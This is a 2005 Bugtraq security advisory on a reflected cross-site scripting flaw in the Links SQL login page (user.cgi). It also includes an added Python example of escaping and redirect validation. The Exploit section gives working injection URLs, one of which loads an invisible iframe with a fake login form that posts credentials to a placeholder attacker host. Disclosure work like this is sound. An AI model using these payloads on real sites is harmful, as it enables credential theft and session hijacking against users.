List: bugtraq
Subject: Gossamer Threads Links SQL login XSS Vulnerability
From: Nathan House <nhouse () stationx ! net>
Date: 2005-05-04 9:12:02
Message-ID: 20050504091202.23541.qmail () www ! securityfocus ! com
Gossamer Threads Links SQL login XSS Vulnerability
Class: Input Validation XSS
Remote: Yes
Local: Yes
Published / Updated: 04th May 2005
Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
+ Links SQL 2.x
+ Links SQL 2.2.x
+ Links SQL 3.0
Not Vulnerable
-
Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads and is used to build any type of directory. Although designed to manage links, Links SQL is very customisable and is used all over the Internet for a wide range of tasks such as image galleries, press releases, yellow pages, company directories, and other categorised databases.
The url variable in the Gossamer Threads Links SQL login page (user.cgi) is a hidden field in the login form and can be passed directly to user.cgi in the form user.cgi?url="xyz". The url variable is client-side input created by the browser when a user clicks on a link which requires authentication; after authentication the user is redirected to the URL held in the url variable. user.cgi does not sufficiently validate this client-side input before reflecting it into the hidden field, and the page is therefore vulnerable to script injection and cross-site scripting (XSS) attacks.
Exploit
This is a standard XSS vulnerability.
Note: an attacker would normally obfuscate the linking code, but for these examples I have made it simple for the sake of understanding.
Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate
Resulting in the following being injected into the HTML:
<input type="hidden" name="url" value=""><script>alert("XSS Vulnerability")</script><"" />
Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No"></iframe><!--&from=rate
Example 2 produces an invisible iframe presenting a fake login screen to collect usernames and passwords. The framed page contains the following HTML:
<form action="http://hacker.com/getusernameandpassword.cgi" method="post">
The <script> content is limited only by the imagination of the attacker; the above are just two examples.
Like all XSS vulnerabilities this is an attack on the user only and not on the system (Links SQL). If the user happens to be the Links SQL moderator/admin, however, this user attack could be used to escalate privilege and then attack Links SQL itself.
To exploit this XSS vulnerability the victim must be tricked into making the above or another carefully crafted HTTP request. There are several ways users can be tricked into doing this; common methods include a link in an HTML-aware email, a web-based forum (such as the Gossamer Threads forum), or a link embedded in a malicious web page.
XSS attacks are often demonstrated by harvesting cookies to perform session hijacking and by gathering other sensitive information.
Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links 3.0.1
http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/
http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;
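As an added illustration (not code from the advisory or from Gossamer Threads), the reflection described in the Discussion is reconstructed beside a hardened form: HTML-encoding the hidden field so the value cannot break out of the attribute, and validating the post-login redirect target so only a same-site relative path is honoured. The function names and the template line are assumptions; the real user.cgi template is not reproduced.

```python
import html
from urllib.parse import urlsplit

# Constructed input: the payload from Simple Example 1 of the advisory.
PAYLOAD = '"><script>alert("XSS Vulnerability")</script><"'


def render_hidden_url_vulnerable(url: str) -> str:
    """Reflects the url parameter into the hidden field verbatim, which is
    the behaviour the advisory describes (a reconstruction, not the real
    Links SQL template)."""
    return '<input type="hidden" name="url" value="%s" />' % url


def render_hidden_url_fixed(url: str) -> str:
    """Escapes & < > and both quote characters, so the client-supplied value
    can neither close the value="..." attribute nor open a new tag."""
    return '<input type="hidden" name="url" value="%s" />' % html.escape(url, quote=True)


def safe_redirect_target(url: str, default: str = "/") -> str:
    """Validates the redirect taken after login. Only a same-site relative
    path is accepted: no scheme, no host, no protocol-relative '//', no
    backslashes (some browsers treat '/\\' like '//') and no control
    characters. Anything else falls back to the default page."""
    if not url or "\\" in url or any(ord(c) < 0x20 for c in url):
        return default
    parts = urlsplit(url)
    if parts.scheme or parts.netloc:
        return default
    if not url.startswith("/") or url.startswith("//"):
        return default
    return url


if __name__ == "__main__":
    # Shows the breakout in the vulnerable output and its absence in the fixed one.
    print(render_hidden_url_vulnerable(PAYLOAD))
    print(render_hidden_url_fixed(PAYLOAD))
    print(safe_redirect_target(PAYLOAD))
    print(safe_redirect_target("/user.cgi?from=rate"))
```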
Credit
Nathan House @ StationX
References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm
Legal Notice
Copyright (©) 2005 StationX (UK) Ltd, hereafter referred to as "StationX".
This advisory written by StationX can be distributed freely electronically without permission from StationX. This advisory may not be altered without the express written permission of StationX. If you wish to print this advisory in whole or in part in any non-electronic form, please contact StationX for consent.
Disclaimer
This advisory, to the best of our knowledge and given current information, is correct and accurate at the date given above under "Published / Updated". Use of any information in this advisory is for informational purposes only, to help further the development of the security industry and help further secure systems. The information in the advisory should NOT be used adversely. StationX, the author and any publishers give no guarantees or warranties at all with regard to any information in this advisory. Under no circumstances shall StationX, the author and any publishers be liable in contract, tort, or otherwise, for any loss or damage whatsoever arising from use of or in any way connected with this advisory or any hyperlinked website, including, without limitation, damages for loss of business, loss of profits, business interruption, loss of business information, loss of programs or other data on the user's information handling system or otherwise maintained, or any other pecuniary loss (even where StationX, the author and any publishers have been advised of the possibility of such loss or damage arising).